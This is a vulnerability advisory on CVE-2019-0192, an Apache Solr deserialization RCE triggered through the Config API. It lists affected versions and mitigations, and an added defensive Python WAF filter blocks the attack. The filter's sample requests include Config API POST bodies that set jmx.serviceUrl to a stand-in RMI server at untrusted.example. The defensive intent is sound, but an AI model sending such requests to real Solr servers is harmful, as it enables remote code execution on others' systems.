On March 7, 2019, Alibaba Cloud Security emergency response center detected a Solr security bulletin issued by Apache. Attackers can call the Config API and modify the jmx.serviceUrl attribute to point to a malicious RMI service, which causes a deserialization remote code execution (RCE) vulnerability in Apache Solr.
CVE ID
CVE-2019-0192
Vulnerability name
Deserialization RCE vulnerability in Apache Solr
Vulnerability description
The Config API allows the jmx.serviceUrl attribute to be configured by using an HTTP POST request. This configuration modifies the Apache Solr JMX server. Attackers can point the attribute at a malicious RMI server and take advantage of the unsafe deserialization in Solr to trigger RCE.

Affected versions
- Apache Solr 5.0.0 to 5.5.5
- Apache Solr 6.0.0 to 6.6.5
Solution
- Upgrade your Apache Solr to 7.0 or later.
- Disable the Config API by setting disable.configEdit=true.
- Ensure that only trusted traffic is allowed to access the Solr server at the network layer.
Protection recommendations
If you do not want to upgrade Solr to resolve this vulnerability, we recommend that you use the custom protection policy feature provided by WAF to protect your business.
You can use the custom protection policy feature to restrict POST requests that contain specific JSON data, such as service:jmx:rmi. This can also prevent RCE attacks.
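As an added example that is not code from Alibaba Cloud, Apache Solr or the WAF product, the Python below implements the custom protection policy described above as a request filter: it blocks a POST to the Config API whose body sets jmx.serviceUrl or contains the service:jmx:rmi prefix, and it also checks whether the disable.configEdit mitigation is present in a Solr startup options string. The Config API path pattern /solr/<collection>/config, the -Ddisable.configEdit=true JVM-property form, and every sample request are assumptions or constructed test data, not captured traffic.

```python
"""Defensive request filter for the Apache Solr Config API / jmx.serviceUrl
issue (CVE-2019-0192). Added example; assumes a WAF or reverse-proxy hook
that hands us the HTTP method, path and raw body of each request."""
import json
import re
from typing import Any, Dict, Iterator, List, Tuple

# Indicators taken from the advisory: the attribute an attacker must set and
# the JMX/RMI service URL prefix that points Solr at an RMI server. Matching
# is case-insensitive so a trivially recased payload is still caught.
SUSPECT_PROPERTY = "jmx.serviceurl"
RMI_URL_RE = re.compile(r"service\s*:\s*jmx\s*:\s*rmi", re.IGNORECASE)
# Assumption: Config API writes go to /solr/<collection>/config.
CONFIG_API_RE = re.compile(r"^/solr/[^/]+/config(?:/|$)")


def _walk(node: Any) -> Iterator[Tuple[str, Any]]:
    """Yield (key, value) pairs from a nested JSON document, depth-first."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield key, value
            yield from _walk(value)
    elif isinstance(node, list):
        for item in node:
            yield from _walk(item)


def inspect_request(method: str, path: str, body: str) -> Dict[str, Any]:
    """Classify one request: {"action": "allow" | "block", "reasons": [...]}."""
    reasons: List[str] = []
    # Only writes to the Config API are in scope for this rule.
    if method.upper() != "POST" or not CONFIG_API_RE.match(path):
        return {"action": "allow", "reasons": reasons}

    if RMI_URL_RE.search(body):
        reasons.append("body contains a JMX/RMI service URL prefix")

    # Parse the body when possible so a set-property of jmx.serviceUrl is
    # caught even when the URL value itself does not match the regex.
    try:
        doc = json.loads(body)
    except ValueError:
        doc = None
        if "set-property" in body and SUSPECT_PROPERTY in body.lower():
            reasons.append("unparseable body references set-property and jmx.serviceUrl")
    if doc is not None:
        for key, value in _walk(doc):
            if key.lower() == SUSPECT_PROPERTY:
                reasons.append(f"set-property targets jmx.serviceUrl -> {value!r}")

    return {"action": "block" if reasons else "allow", "reasons": reasons}


def config_edit_disabled(solr_opts: str) -> bool:
    """True when the startup options carry the mitigation the advisory names,
    assumed here to be passed as the JVM property -Ddisable.configEdit=true."""
    return re.search(r"-Ddisable\.configEdit=true\b", solr_opts) is not None


# Constructed sample requests (not captured traffic) for a quick self-check.
SAMPLE_REQUESTS = [
    ("GET", "/solr/products/config", ""),
    ("POST", "/solr/products/config",
     '{"set-property": {"updateHandler.autoCommit.maxTime": 15000}}'),
    ("POST", "/solr/products/config",
     '{"set-property": {"jmx.serviceUrl": "service:jmx:rmi://untrusted.example:1099/jmxrmi"}}'),
    ("POST", "/solr/products/config",
     '{"set-property": {"JMX.ServiceURL": "SERVICE:JMX:RMI://untrusted.example:1099/jmxrmi"}}'),
    ("POST", "/solr/products/select", 'q=service:jmx:rmi'),  # not the Config API
]


def evaluate_samples() -> List[str]:
    """Run the filter over SAMPLE_REQUESTS and return the action per request."""
    return [inspect_request(m, p, b)["action"] for m, p, b in SAMPLE_REQUESTS]


if __name__ == "__main__":
    for (method, path, body), action in zip(SAMPLE_REQUESTS, evaluate_samples()):
        print(f"{action:5} {method} {path} {body[:60]}")
    print("configEdit disabled:", config_edit_disabled("-Xmx2g -Ddisable.configEdit=true"))
```

The regex check and the JSON walk are deliberately redundant: the literal match catches bodies that are not valid JSON, while the parsed walk catches a jmx.serviceUrl assignment whose value has been encoded so the prefix does not appear verbatim. A rule that blocks on either condition is the one to load into the WAF custom policy.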
